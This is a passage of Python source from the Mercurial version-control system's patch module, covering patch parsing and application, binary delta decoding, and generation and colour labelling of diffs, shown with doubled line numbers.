1863 1863 h = binhunk(lr, gp.path)
1864 1864 else:
1865 1865 if context is None and x.startswith('***************'):
1866 1866 context = True
1867 1867 h = hunk(x, hunknum + 1, lr, context)
1868 1868 hunknum += 1
1869 1869 if emitfile:
1870 1870 emitfile = False
1871 1871 yield 'file', (afile, bfile, h, gp and gp.copy() or None)
1872 1872 yield 'hunk', h
1873 1873 elif x.startswith('diff --git a/'):
1874 1874 m = gitre.match(x.rstrip(' \r\n'))
1875 1875 if not m:
1876 1876 continue
1877 1877 if gitpatches is None:
1878 1878 # scan whole input for git metadata
1879 1879 gitpatches = scangitpatch(lr, x)
1880 1880 yield 'git', [g.copy() for g in gitpatches
1881 1881 if g.op in ('COPY', 'RENAME')]
1882 1882 gitpatches.reverse()
1883 1883 afile = 'a/' + m.group(1)
1884 1884 bfile = 'b/' + m.group(2)
1885 1885 while gitpatches and not gitpatches[-1].ispatching(afile, bfile):
1886 1886 gp = gitpatches.pop()
1887 1887 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1888 1888 if not gitpatches:
1889 1889 raise PatchError(_('failed to synchronize metadata for "%s"')
1890 1890 % afile[2:])
1891 1891 gp = gitpatches[-1]
1892 1892 newfile = True
1893 1893 elif x.startswith('---'):
1894 1894 # check for a unified diff
1895 1895 l2 = lr.readline()
1896 1896 if not l2.startswith('+++'):
1897 1897 lr.push(l2)
1898 1898 continue
1899 1899 newfile = True
1900 1900 context = False
1901 1901 afile = parsefilename(x)
1902 1902 bfile = parsefilename(l2)
1903 1903 elif x.startswith('***'):
1904 1904 # check for a context diff
1905 1905 l2 = lr.readline()
1906 1906 if not l2.startswith('---'):
1907 1907 lr.push(l2)
1908 1908 continue
1909 1909 l3 = lr.readline()
1910 1910 lr.push(l3)
1911 1911 if not l3.startswith("***************"):
1912 1912 lr.push(l2)
1913 1913 continue
1914 1914 newfile = True
1915 1915 context = True
1916 1916 afile = parsefilename(x)
1917 1917 bfile = parsefilename(l2)
1918 1918
1919 1919 if newfile:
1920 1920 newfile = False
1921 1921 emitfile = True
1922 1922 state = BFILE
1923 1923 hunknum = 0
1924 1924
1925 1925 while gitpatches:
1926 1926 gp = gitpatches.pop()
1927 1927 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1928 1928
1929 1929 def applybindelta(binchunk, data):
1930 1930 """Apply a binary delta hunk
1931 1931 The algorithm used is the algorithm from git's patch-delta.c
1932 1932 """
1933 1933 def deltahead(binchunk):
1934 1934 i = 0
1935 1935 for c in binchunk:
1936 1936 i += 1
1937 1937 if not (ord(c) & 0x80):
1938 1938 return i
1939 1939 return i
1940 1940 out = ""
1941 1941 s = deltahead(binchunk)
1942 1942 binchunk = binchunk[s:]
1943 1943 s = deltahead(binchunk)
1944 1944 binchunk = binchunk[s:]
1945 1945 i = 0
1946 1946 while i < len(binchunk):
1947 1947 cmd = ord(binchunk[i])
1948 1948 i += 1
1949 1949 if (cmd & 0x80):
1950 1950 offset = 0
1951 1951 size = 0
1952 1952 if (cmd & 0x01):
1953 1953 offset = ord(binchunk[i])
1954 1954 i += 1
1955 1955 if (cmd & 0x02):
1956 1956 offset |= ord(binchunk[i]) << 8
1957 1957 i += 1
1958 1958 if (cmd & 0x04):
1959 1959 offset |= ord(binchunk[i]) << 16
1960 1960 i += 1
1961 1961 if (cmd & 0x08):
1962 1962 offset |= ord(binchunk[i]) << 24
1963 1963 i += 1
1964 1964 if (cmd & 0x10):
1965 1965 size = ord(binchunk[i])
1966 1966 i += 1
1967 1967 if (cmd & 0x20):
1968 1968 size |= ord(binchunk[i]) << 8
1969 1969 i += 1
1970 1970 if (cmd & 0x40):
1971 1971 size |= ord(binchunk[i]) << 16
1972 1972 i += 1
1973 1973 if size == 0:
1974 1974 size = 0x10000
1975 1975 offset_end = offset + size
1976 1976 out += data[offset:offset_end]
1977 1977 elif cmd != 0:
1978 1978 offset_end = i + cmd
1979 1979 out += binchunk[i:offset_end]
1980 1980 i += cmd
1981 1981 else:
1982 1982 raise PatchError(_('unexpected delta opcode 0'))
1983 1983 return out
1984 1984
1985 1985 def applydiff(ui, fp, backend, store, strip=1, prefix='', eolmode='strict'):
1986 1986 """Reads a patch from fp and tries to apply it.
1987 1987
1988 1988 Returns 0 for a clean patch, -1 if any rejects were found and 1 if
1989 1989 there was any fuzz.
1990 1990
1991 1991 If 'eolmode' is 'strict', the patch content and patched file are
1992 1992 read in binary mode. Otherwise, line endings are ignored when
1993 1993 patching then normalized according to 'eolmode'.
1994 1994 """
1995 1995 return _applydiff(ui, fp, patchfile, backend, store, strip=strip,
1996 1996 prefix=prefix, eolmode=eolmode)
1997 1997
1998 1998 def _canonprefix(repo, prefix):
1999 1999 if prefix:
2000 2000 prefix = pathutil.canonpath(repo.root, repo.getcwd(), prefix)
2001 2001 if prefix != '':
2002 2002 prefix += '/'
2003 2003 return prefix
2004 2004
2005 2005 def _applydiff(ui, fp, patcher, backend, store, strip=1, prefix='',
2006 2006 eolmode='strict'):
2007 2007 prefix = _canonprefix(backend.repo, prefix)
2008 2008 def pstrip(p):
2009 2009 return pathtransform(p, strip - 1, prefix)[1]
2010 2010
2011 2011 rejects = 0
2012 2012 err = 0
2013 2013 current_file = None
2014 2014
2015 2015 for state, values in iterhunks(fp):
2016 2016 if state == 'hunk':
2017 2017 if not current_file:
2018 2018 continue
2019 2019 ret = current_file.apply(values)
2020 2020 if ret > 0:
2021 2021 err = 1
2022 2022 elif state == 'file':
2023 2023 if current_file:
2024 2024 rejects += current_file.close()
2025 2025 current_file = None
2026 2026 afile, bfile, first_hunk, gp = values
2027 2027 if gp:
2028 2028 gp.path = pstrip(gp.path)
2029 2029 if gp.oldpath:
2030 2030 gp.oldpath = pstrip(gp.oldpath)
2031 2031 else:
2032 2032 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2033 2033 prefix)
2034 2034 if gp.op == 'RENAME':
2035 2035 backend.unlink(gp.oldpath)
2036 2036 if not first_hunk:
2037 2037 if gp.op == 'DELETE':
2038 2038 backend.unlink(gp.path)
2039 2039 continue
2040 2040 data, mode = None, None
2041 2041 if gp.op in ('RENAME', 'COPY'):
2042 2042 data, mode = store.getfile(gp.oldpath)[:2]
2043 2043 if data is None:
2044 2044 # This means that the old path does not exist
2045 2045 raise PatchError(_("source file '%s' does not exist")
2046 2046 % gp.oldpath)
2047 2047 if gp.mode:
2048 2048 mode = gp.mode
2049 2049 if gp.op == 'ADD':
2050 2050 # Added files without content have no hunk and
2051 2051 # must be created
2052 2052 data = ''
2053 2053 if data or mode:
2054 2054 if (gp.op in ('ADD', 'RENAME', 'COPY')
2055 2055 and backend.exists(gp.path)):
2056 2056 raise PatchError(_("cannot create %s: destination "
2057 2057 "already exists") % gp.path)
2058 2058 backend.setfile(gp.path, data, mode, gp.oldpath)
2059 2059 continue
2060 2060 try:
2061 2061 current_file = patcher(ui, gp, backend, store,
2062 2062 eolmode=eolmode)
2063 2063 except PatchError as inst:
2064 2064 ui.warn(str(inst) + '\n')
2065 2065 current_file = None
2066 2066 rejects += 1
2067 2067 continue
2068 2068 elif state == 'git':
2069 2069 for gp in values:
2070 2070 path = pstrip(gp.oldpath)
2071 2071 data, mode = backend.getfile(path)
2072 2072 if data is None:
2073 2073 # The error ignored here will trigger a getfile()
2074 2074 # error in a place more appropriate for error
2075 2075 # handling, and will not interrupt the patching
2076 2076 # process.
2077 2077 pass
2078 2078 else:
2079 2079 store.setfile(path, data, mode)
2080 2080 else:
2081 2081 raise error.Abort(_('unsupported parser state: %s') % state)
2082 2082
2083 2083 if current_file:
2084 2084 rejects += current_file.close()
2085 2085
2086 2086 if rejects:
2087 2087 return -1
2088 2088 return err
2089 2089
2090 2090 def _externalpatch(ui, repo, patcher, patchname, strip, files,
2091 2091 similarity):
2092 2092 """use <patcher> to apply <patchname> to the working directory.
2093 2093 returns whether patch was applied with fuzz factor."""
2094 2094
2095 2095 fuzz = False
2096 2096 args = []
2097 2097 cwd = repo.root
2098 2098 if cwd:
2099 2099 args.append('-d %s' % util.shellquote(cwd))
2100 2100 fp = util.popen('%s %s -p%d < %s' % (patcher, ' '.join(args), strip,
2101 2101 util.shellquote(patchname)))
2102 2102 try:
2103 2103 for line in util.iterfile(fp):
2104 2104 line = line.rstrip()
2105 2105 ui.note(line + '\n')
2106 2106 if line.startswith('patching file '):
2107 2107 pf = util.parsepatchoutput(line)
2108 2108 printed_file = False
2109 2109 files.add(pf)
2110 2110 elif line.find('with fuzz') >= 0:
2111 2111 fuzz = True
2112 2112 if not printed_file:
2113 2113 ui.warn(pf + '\n')
2114 2114 printed_file = True
2115 2115 ui.warn(line + '\n')
2116 2116 elif line.find('saving rejects to file') >= 0:
2117 2117 ui.warn(line + '\n')
2118 2118 elif line.find('FAILED') >= 0:
2119 2119 if not printed_file:
2120 2120 ui.warn(pf + '\n')
2121 2121 printed_file = True
2122 2122 ui.warn(line + '\n')
2123 2123 finally:
2124 2124 if files:
2125 2125 scmutil.marktouched(repo, files, similarity)
2126 2126 code = fp.close()
2127 2127 if code:
2128 2128 raise PatchError(_("patch command failed: %s") %
2129 2129 util.explainexit(code)[0])
2130 2130 return fuzz
2131 2131
2132 2132 def patchbackend(ui, backend, patchobj, strip, prefix, files=None,
2133 2133 eolmode='strict'):
2134 2134 if files is None:
2135 2135 files = set()
2136 2136 if eolmode is None:
2137 2137 eolmode = ui.config('patch', 'eol')
2138 2138 if eolmode.lower() not in eolmodes:
2139 2139 raise error.Abort(_('unsupported line endings type: %s') % eolmode)
2140 2140 eolmode = eolmode.lower()
2141 2141
2142 2142 store = filestore()
2143 2143 try:
2144 2144 fp = open(patchobj, 'rb')
2145 2145 except TypeError:
2146 2146 fp = patchobj
2147 2147 try:
2148 2148 ret = applydiff(ui, fp, backend, store, strip=strip, prefix=prefix,
2149 2149 eolmode=eolmode)
2150 2150 finally:
2151 2151 if fp != patchobj:
2152 2152 fp.close()
2153 2153 files.update(backend.close())
2154 2154 store.close()
2155 2155 if ret < 0:
2156 2156 raise PatchError(_('patch failed to apply'))
2157 2157 return ret > 0
2158 2158
2159 2159 def internalpatch(ui, repo, patchobj, strip, prefix='', files=None,
2160 2160 eolmode='strict', similarity=0):
2161 2161 """use builtin patch to apply <patchobj> to the working directory.
2162 2162 returns whether patch was applied with fuzz factor."""
2163 2163 backend = workingbackend(ui, repo, similarity)
2164 2164 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2165 2165
2166 2166 def patchrepo(ui, repo, ctx, store, patchobj, strip, prefix, files=None,
2167 2167 eolmode='strict'):
2168 2168 backend = repobackend(ui, repo, ctx, store)
2169 2169 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2170 2170
2171 2171 def patch(ui, repo, patchname, strip=1, prefix='', files=None, eolmode='strict',
2172 2172 similarity=0):
2173 2173 """Apply <patchname> to the working directory.
2174 2174
2175 2175 'eolmode' specifies how end of lines should be handled. It can be:
2176 2176 - 'strict': inputs are read in binary mode, EOLs are preserved
2177 2177 - 'crlf': EOLs are ignored when patching and reset to CRLF
2178 2178 - 'lf': EOLs are ignored when patching and reset to LF
2179 2179 - None: get it from user settings, default to 'strict'
2180 2180 'eolmode' is ignored when using an external patcher program.
2181 2181
2182 2182 Returns whether patch was applied with fuzz factor.
2183 2183 """
2184 2184 patcher = ui.config('ui', 'patch')
2185 2185 if files is None:
2186 2186 files = set()
2187 2187 if patcher:
2188 2188 return _externalpatch(ui, repo, patcher, patchname, strip,
2189 2189 files, similarity)
2190 2190 return internalpatch(ui, repo, patchname, strip, prefix, files, eolmode,
2191 2191 similarity)
2192 2192
2193 2193 def changedfiles(ui, repo, patchpath, strip=1, prefix=''):
2194 2194 backend = fsbackend(ui, repo.root)
2195 2195 prefix = _canonprefix(repo, prefix)
2196 2196 with open(patchpath, 'rb') as fp:
2197 2197 changed = set()
2198 2198 for state, values in iterhunks(fp):
2199 2199 if state == 'file':
2200 2200 afile, bfile, first_hunk, gp = values
2201 2201 if gp:
2202 2202 gp.path = pathtransform(gp.path, strip - 1, prefix)[1]
2203 2203 if gp.oldpath:
2204 2204 gp.oldpath = pathtransform(gp.oldpath, strip - 1,
2205 2205 prefix)[1]
2206 2206 else:
2207 2207 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2208 2208 prefix)
2209 2209 changed.add(gp.path)
2210 2210 if gp.op == 'RENAME':
2211 2211 changed.add(gp.oldpath)
2212 2212 elif state not in ('hunk', 'git'):
2213 2213 raise error.Abort(_('unsupported parser state: %s') % state)
2214 2214 return changed
2215 2215
2216 2216 class GitDiffRequired(Exception):
2217 2217 pass
2218 2218
2219 2219 def diffallopts(ui, opts=None, untrusted=False, section='diff'):
2220 2220 '''return diffopts with all features supported and parsed'''
2221 2221 return difffeatureopts(ui, opts=opts, untrusted=untrusted, section=section,
2222 2222 git=True, whitespace=True, formatchanging=True)
2223 2223
2224 2224 diffopts = diffallopts
2225 2225
2226 2226 def difffeatureopts(ui, opts=None, untrusted=False, section='diff', git=False,
2227 2227 whitespace=False, formatchanging=False):
2228 2228 '''return diffopts with only opted-in features parsed
2229 2229
2230 2230 Features:
2231 2231 - git: git-style diffs
2232 2232 - whitespace: whitespace options like ignoreblanklines and ignorews
2233 2233 - formatchanging: options that will likely break or cause correctness issues
2234 2234 with most diff parsers
2235 2235 '''
2236 2236 def get(key, name=None, getter=ui.configbool, forceplain=None):
2237 2237 if opts:
2238 2238 v = opts.get(key)
2239 2239 # diffopts flags are either None-default (which is passed
2240 2240 # through unchanged, so we can identify unset values), or
2241 2241 # some other falsey default (eg --unified, which defaults
2242 2242 # to an empty string). We only want to override the config
2243 2243 # entries from hgrc with command line values if they
2244 2244 # appear to have been set, which is any truthy value,
2245 2245 # True, or False.
2246 2246 if v or isinstance(v, bool):
2247 2247 return v
2248 2248 if forceplain is not None and ui.plain():
2249 2249 return forceplain
2250 2250 return getter(section, name or key, untrusted=untrusted)
2251 2251
2252 2252 # core options, expected to be understood by every diff parser
2253 2253 buildopts = {
2254 2254 'nodates': get('nodates'),
2255 2255 'showfunc': get('show_function', 'showfunc'),
2256 2256 'context': get('unified', getter=ui.config),
2257 2257 }
2258 2258 buildopts['worddiff'] = ui.configbool('experimental', 'worddiff')
2259 2259 buildopts['xdiff'] = ui.configbool('experimental', 'xdiff')
2260 2260
2261 2261 if git:
2262 2262 buildopts['git'] = get('git')
2263 2263
2264 2264 # since this is in the experimental section, we need to call
2265 2265 # ui.configbool directory
2266 2266 buildopts['showsimilarity'] = ui.configbool('experimental',
2267 2267 'extendedheader.similarity')
2268 2268
2269 2269 # need to inspect the ui object instead of using get() since we want to
2270 2270 # test for an int
2271 2271 hconf = ui.config('experimental', 'extendedheader.index')
2272 2272 if hconf is not None:
2273 2273 hlen = None
2274 2274 try:
2275 2275 # the hash config could be an integer (for length of hash) or a
2276 2276 # word (e.g. short, full, none)
2277 2277 hlen = int(hconf)
2278 2278 if hlen < 0 or hlen > 40:
2279 2279 msg = _("invalid length for extendedheader.index: '%d'\n")
2280 2280 ui.warn(msg % hlen)
2281 2281 except ValueError:
2282 2282 # default value
2283 2283 if hconf == 'short' or hconf == '':
2284 2284 hlen = 12
2285 2285 elif hconf == 'full':
2286 2286 hlen = 40
2287 2287 elif hconf != 'none':
2288 2288 msg = _("invalid value for extendedheader.index: '%s'\n")
2289 2289 ui.warn(msg % hconf)
2290 2290 finally:
2291 2291 buildopts['index'] = hlen
2292 2292
2293 2293 if whitespace:
2294 2294 buildopts['ignorews'] = get('ignore_all_space', 'ignorews')
2295 2295 buildopts['ignorewsamount'] = get('ignore_space_change',
2296 2296 'ignorewsamount')
2297 2297 buildopts['ignoreblanklines'] = get('ignore_blank_lines',
2298 2298 'ignoreblanklines')
2299 2299 buildopts['ignorewseol'] = get('ignore_space_at_eol', 'ignorewseol')
2300 2300 if formatchanging:
2301 2301 buildopts['text'] = opts and opts.get('text')
2302 2302 binary = None if opts is None else opts.get('binary')
2303 2303 buildopts['nobinary'] = (not binary if binary is not None
2304 2304 else get('nobinary', forceplain=False))
2305 2305 buildopts['noprefix'] = get('noprefix', forceplain=False)
2306 2306
2307 2307 return mdiff.diffopts(**pycompat.strkwargs(buildopts))
2308 2308
2309 2309 def diff(repo, node1=None, node2=None, match=None, changes=None,
2310 2310 opts=None, losedatafn=None, prefix='', relroot='', copy=None,
2311 2311 hunksfilterfn=None):
2312 2312 '''yields diff of changes to files between two nodes, or node and
2313 2313 working directory.
2314 2314
2315 2315 if node1 is None, use first dirstate parent instead.
2316 2316 if node2 is None, compare node1 with working directory.
2317 2317
2318 2318 losedatafn(**kwarg) is a callable run when opts.upgrade=True and
2319 2319 every time some change cannot be represented with the current
2320 2320 patch format. Return False to upgrade to git patch format, True to
2321 2321 accept the loss or raise an exception to abort the diff. It is
2322 2322 called with the name of current file being diffed as 'fn'. If set
2323 2323 to None, patches will always be upgraded to git format when
2324 2324 necessary.
2325 2325
2326 2326 prefix is a filename prefix that is prepended to all filenames on
2327 2327 display (used for subrepos).
2328 2328
2329 2329 relroot, if not empty, must be normalized with a trailing /. Any match
2330 2330 patterns that fall outside it will be ignored.
2331 2331
2332 2332 copy, if not empty, should contain mappings {dst@y: src@x} of copy
2333 2333 information.
2334 2334
2335 2335 hunksfilterfn, if not None, should be a function taking a filectx and
2336 2336 hunks generator that may yield filtered hunks.
2337 2337 '''
2338 2338 for fctx1, fctx2, hdr, hunks in diffhunks(
2339 2339 repo, node1=node1, node2=node2,
2340 2340 match=match, changes=changes, opts=opts,
2341 2341 losedatafn=losedatafn, prefix=prefix, relroot=relroot, copy=copy,
2342 2342 ):
2343 2343 if hunksfilterfn is not None:
2344 2344 # If the file has been removed, fctx2 is None; but this should
2345 2345 # not occur here since we catch removed files early in
2346 2346 # logcmdutil.getlinerangerevs() for 'hg log -L'.
2347 2347 assert fctx2 is not None, \
2348 2348 'fctx2 unexpectly None in diff hunks filtering'
2349 2349 hunks = hunksfilterfn(fctx2, hunks)
2350 2350 text = ''.join(sum((list(hlines) for hrange, hlines in hunks), []))
2351 2351 if hdr and (text or len(hdr) > 1):
2352 2352 yield '\n'.join(hdr) + '\n'
2353 2353 if text:
2354 2354 yield text
2355 2355
2356 2356 def diffhunks(repo, node1=None, node2=None, match=None, changes=None,
2357 2357 opts=None, losedatafn=None, prefix='', relroot='', copy=None):
2358 2358 """Yield diff of changes to files in the form of (`header`, `hunks`) tuples
2359 2359 where `header` is a list of diff headers and `hunks` is an iterable of
2360 2360 (`hunkrange`, `hunklines`) tuples.
2361 2361
2362 2362 See diff() for the meaning of parameters.
2363 2363 """
2364 2364
2365 2365 if opts is None:
2366 2366 opts = mdiff.defaultopts
2367 2367
2368 2368 if not node1 and not node2:
2369 2369 node1 = repo.dirstate.p1()
2370 2370
2371 2371 def lrugetfilectx():
2372 2372 cache = {}
2373 2373 order = collections.deque()
2374 2374 def getfilectx(f, ctx):
2375 2375 fctx = ctx.filectx(f, filelog=cache.get(f))
2376 2376 if f not in cache:
2377 2377 if len(cache) > 20:
2378 2378 del cache[order.popleft()]
2379 2379 cache[f] = fctx.filelog()
2380 2380 else:
2381 2381 order.remove(f)
2382 2382 order.append(f)
2383 2383 return fctx
2384 2384 return getfilectx
2385 2385 getfilectx = lrugetfilectx()
2386 2386
2387 2387 ctx1 = repo[node1]
2388 2388 ctx2 = repo[node2]
2389 2389
2390 2390 relfiltered = False
2391 2391 if relroot != '' and match.always():
2392 2392 # as a special case, create a new matcher with just the relroot
2393 2393 pats = [relroot]
2394 2394 match = scmutil.match(ctx2, pats, default='path')
2395 2395 relfiltered = True
2396 2396
2397 2397 if not changes:
2398 2398 changes = repo.status(ctx1, ctx2, match=match)
2399 2399 modified, added, removed = changes[:3]
2400 2400
2401 2401 if not modified and not added and not removed:
2402 2402 return []
2403 2403
2404 2404 if repo.ui.debugflag:
2405 2405 hexfunc = hex
2406 2406 else:
2407 2407 hexfunc = short
2408 2408 revs = [hexfunc(node) for node in [ctx1.node(), ctx2.node()] if node]
2409 2409
2410 2410 if copy is None:
2411 2411 copy = {}
2412 2412 if opts.git or opts.upgrade:
2413 2413 copy = copies.pathcopies(ctx1, ctx2, match=match)
2414 2414
2415 2415 if relroot is not None:
2416 2416 if not relfiltered:
2417 2417 # XXX this would ideally be done in the matcher, but that is
2418 2418 # generally meant to 'or' patterns, not 'and' them. In this case we
2419 2419 # need to 'and' all the patterns from the matcher with relroot.
2420 2420 def filterrel(l):
2421 2421 return [f for f in l if f.startswith(relroot)]
2422 2422 modified = filterrel(modified)
2423 2423 added = filterrel(added)
2424 2424 removed = filterrel(removed)
2425 2425 relfiltered = True
2426 2426 # filter out copies where either side isn't inside the relative root
2427 2427 copy = dict(((dst, src) for (dst, src) in copy.iteritems()
2428 2428 if dst.startswith(relroot)
2429 2429 and src.startswith(relroot)))
2430 2430
2431 2431 modifiedset = set(modified)
2432 2432 addedset = set(added)
2433 2433 removedset = set(removed)
2434 2434 for f in modified:
2435 2435 if f not in ctx1:
2436 2436 # Fix up added, since merged-in additions appear as
2437 2437 # modifications during merges
2438 2438 modifiedset.remove(f)
2439 2439 addedset.add(f)
2440 2440 for f in removed:
2441 2441 if f not in ctx1:
2442 2442 # Merged-in additions that are then removed are reported as removed.
2443 2443 # They are not in ctx1, so We don't want to show them in the diff.
2444 2444 removedset.remove(f)
2445 2445 modified = sorted(modifiedset)
2446 2446 added = sorted(addedset)
2447 2447 removed = sorted(removedset)
2448 2448 for dst, src in list(copy.items()):
2449 2449 if src not in ctx1:
2450 2450 # Files merged in during a merge and then copied/renamed are
2451 2451 # reported as copies. We want to show them in the diff as additions.
2452 2452 del copy[dst]
2453 2453
2454 2454 def difffn(opts, losedata):
2455 2455 return trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2456 2456 copy, getfilectx, opts, losedata, prefix, relroot)
2457 2457 if opts.upgrade and not opts.git:
2458 2458 try:
2459 2459 def losedata(fn):
2460 2460 if not losedatafn or not losedatafn(fn=fn):
2461 2461 raise GitDiffRequired
2462 2462 # Buffer the whole output until we are sure it can be generated
2463 2463 return list(difffn(opts.copy(git=False), losedata))
2464 2464 except GitDiffRequired:
2465 2465 return difffn(opts.copy(git=True), None)
2466 2466 else:
2467 2467 return difffn(opts, None)
2468 2468
2469 2469 def difflabel(func, *args, **kw):
2470 2470 '''yields 2-tuples of (output, label) based on the output of func()'''
2471 2471 inlinecolor = False
2472 2472 if kw.get(r'opts'):
2473 2473 inlinecolor = kw[r'opts'].worddiff
2474 2474 headprefixes = [('diff', 'diff.diffline'),
2475 2475 ('copy', 'diff.extended'),
2476 2476 ('rename', 'diff.extended'),
2477 2477 ('old', 'diff.extended'),
2478 2478 ('new', 'diff.extended'),
2479 2479 ('deleted', 'diff.extended'),
2480 2480 ('index', 'diff.extended'),
2481 2481 ('similarity', 'diff.extended'),
2482 2482 ('---', 'diff.file_a'),
2483 2483 ('+++', 'diff.file_b')]
2484 2484 textprefixes = [('@', 'diff.hunk'),
2485 2485 ('-', 'diff.deleted'),
2486 2486 ('+', 'diff.inserted')]
2487 2487 head = False
2488 2488 for chunk in func(*args, **kw):
2489 2489 lines = chunk.split('\n')
2490 2490 matches = {}
2491 2491 if inlinecolor:
2492 2492 matches = _findmatches(lines)
2493 2493 for i, line in enumerate(lines):
2494 2494 if i != 0:
2495 2495 yield ('\n', '')
2496 2496 if head:
2497 2497 if line.startswith('@'):
2498 2498 head = False
2499 2499 else:
2500 2500 if line and line[0] not in ' +-@\\':
2501 2501 head = True
2502 2502 stripline = line
2503 2503 diffline = False
2504 2504 if not head and line and line[0] in '+-':
2505 2505 # highlight tabs and trailing whitespace, but only in
2506 2506 # changed lines
2507 2507 stripline = line.rstrip()
2508 2508 diffline = True
2509 2509
2510 2510 prefixes = textprefixes
2511 2511 if head:
2512 2512 prefixes = headprefixes
2513 2513 for prefix, label in prefixes:
2514 2514 if stripline.startswith(prefix):
2515 2515 if diffline:
2516 2516 if i in matches:
2517 2517 for t, l in _inlinediff(lines[i].rstrip(),
2518 2518 lines[matches[i]].rstrip(),
2519 2519 label):
2520 2520 yield (t, l)
2521 2521 else:
2522 2522 for token in tabsplitter.findall(stripline):
2523 2523 if token.startswith('\t'):
2524 2524 yield (token, 'diff.tab')
2525 2525 else:
2526 2526 yield (token, label)
2527 2527 else:
2528 2528 yield (stripline, label)
2529 2529 break
2530 2530 else:
2531 2531 yield (line, '')
2532 2532 if line != stripline:
2533 2533 yield (line[len(stripline):], 'diff.trailingwhitespace')
2534 2534
2535 2535 def _findmatches(slist):
2536 2536 '''Look for insertion matches to deletion and returns a dict of
2537 2537 correspondences.
2538 2538 '''
2539 2539 lastmatch = 0
2540 2540 matches = {}
2541 2541 for i, line in enumerate(slist):
2542 2542 if line == '':
2543 2543 continue
2544 2544 if line[0] == '-':
2545 2545 lastmatch = max(lastmatch, i)
2546 2546 newgroup = False
2547 2547 for j, newline in enumerate(slist[lastmatch + 1:]):
2548 2548 if newline == '':
2549 2549 continue
2550 2550 if newline[0] == '-' and newgroup: # too far, no match
2551 2551 break
2552 2552 if newline[0] == '+': # potential match
2553 2553 newgroup = True
2554 2554 sim = difflib.SequenceMatcher(None, line, newline).ratio()
2555 2555 if sim > 0.7:
2556 2556 lastmatch = lastmatch + 1 + j
2557 2557 matches[i] = lastmatch
2558 2558 matches[lastmatch] = i
2559 2559 break
2560 2560 return matches
2561 2561
2562 2562 def _inlinediff(s1, s2, operation):
2563 2563 '''Perform string diff to highlight specific changes.'''
2564 2564 operation_skip = '+?' if operation == 'diff.deleted' else '-?'
2565 2565 if operation == 'diff.deleted':
2566 2566 s2, s1 = s1, s2
2567 2567
2568 2568 buff = []
2569 2569 # we never want to higlight the leading +-
2570 2570 if operation == 'diff.deleted' and s2.startswith('-'):
2571 2571 label = operation
2572 2572 token = '-'
2573 2573 s2 = s2[1:]
2574 2574 s1 = s1[1:]
2575 2575 elif operation == 'diff.inserted' and s1.startswith('+'):
2576 2576 label = operation
2577 2577 token = '+'
2578 2578 s2 = s2[1:]
2579 2579 s1 = s1[1:]
2580 2580 else:
2581 2581 raise error.ProgrammingError("Case not expected, operation = %s" %
2582 2582 operation)
2583 2583
2584 2584 s = difflib.ndiff(_nonwordre.split(s2), _nonwordre.split(s1))
2585 2585 for part in s:
2586 2586 if part[0] in operation_skip or len(part) == 2:
2587 2587 continue
2588 2588 l = operation + '.highlight'
2589 2589 if part[0] in ' ':
2590 2590 l = operation
2591 2591 if part[2:] == '\t':
2592 2592 l = 'diff.tab'
2593 2593 if l == label: # contiguous token with same label
2594 2594 token += part[2:]
2595 2595 continue
2596 2596 else:
2597 2597 buff.append((token, label))
2598 2598 label = l
2599 2599 token = part[2:]
2600 2600 buff.append((token, label))
2601 2601
2602 2602 return buff
2603 2603
2604 2604 def diffui(*args, **kw):
2605 2605 '''like diff(), but yields 2-tuples of (output, label) for ui.write()'''
2606 2606 return difflabel(diff, *args, **kw)
2607 2607
2608 2608 def _filepairs(modified, added, removed, copy, opts):
2609 2609 '''generates tuples (f1, f2, copyop), where f1 is the name of the file
2610 2610 before and f2 is the the name after. For added files, f1 will be None,
2611 2611 and for removed files, f2 will be None. copyop may be set to None, 'copy'
2612 2612 or 'rename' (the latter two only if opts.git is set).'''
2613 2613 gone = set()
2614 2614
2615 2615 copyto = dict([(v, k) for k, v in copy.items()])
2616 2616
2617 2617 addedset, removedset = set(added), set(removed)
2618 2618
2619 2619 for f in sorted(modified + added + removed):
2620 2620 copyop = None
2621 2621 f1, f2 = f, f
2622 2622 if f in addedset:
2623 2623 f1 = None
2624 2624 if f in copy:
2625 2625 if opts.git:
2626 2626 f1 = copy[f]
2627 2627 if f1 in removedset and f1 not in gone:
2628 2628 copyop = 'rename'
2629 2629 gone.add(f1)
2630 2630 else:
2631 2631 copyop = 'copy'
2632 2632 elif f in removedset:
2633 2633 f2 = None
2634 2634 if opts.git:
2635 2635 # have we already reported a copy above?
2636 2636 if (f in copyto and copyto[f] in addedset
2637 2637 and copy[copyto[f]] == f):
2638 2638 continue
2639 2639 yield f1, f2, copyop
2640 2640
2641 2641 def trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2642 2642 copy, getfilectx, opts, losedatafn, prefix, relroot):
2643 2643 '''given input data, generate a diff and yield it in blocks
2644 2644
2645 2645 If generating a diff would lose data like flags or binary data and
2646 2646 losedatafn is not None, it will be called.
2647 2647
2648 2648 relroot is removed and prefix is added to every path in the diff output.
2649 2649
2650 2650 If relroot is not empty, this function expects every path in modified,
2651 2651 added, removed and copy to start with it.'''
2652 2652
2653 2653 def gitindex(text):
2654 2654 if not text:
2655 2655 text = ""
2656 2656 l = len(text)
2657 2657 s = hashlib.sha1('blob %d\0' % l)
2658 2658 s.update(text)
2659 2659 return hex(s.digest())
2660 2660
2661 2661 if opts.noprefix:
2662 2662 aprefix = bprefix = ''
2663 2663 else:
2664 2664 aprefix = 'a/'
2665 2665 bprefix = 'b/'
2666 2666
2667 2667 def diffline(f, revs):
2668 2668 revinfo = ' '.join(["-r %s" % rev for rev in revs])
2669 2669 return 'diff %s %s' % (revinfo, f)
2670 2670
2671 2671 def isempty(fctx):
2672 2672 return fctx is None or fctx.size() == 0
2673 2673
2674 2674 date1 = dateutil.datestr(ctx1.date())
2675 2675 date2 = dateutil.datestr(ctx2.date())
2676 2676
2677 2677 gitmode = {'l': '120000', 'x': '100755', '': '100644'}
2678 2678
2679 2679 if relroot != '' and (repo.ui.configbool('devel', 'all-warnings')
2680 2680 or repo.ui.configbool('devel', 'check-relroot')):
2681 2681 for f in modified + added + removed + list(copy) + list(copy.values()):
2682 2682 if f is not None and not f.startswith(relroot):
2683 2683 raise AssertionError(
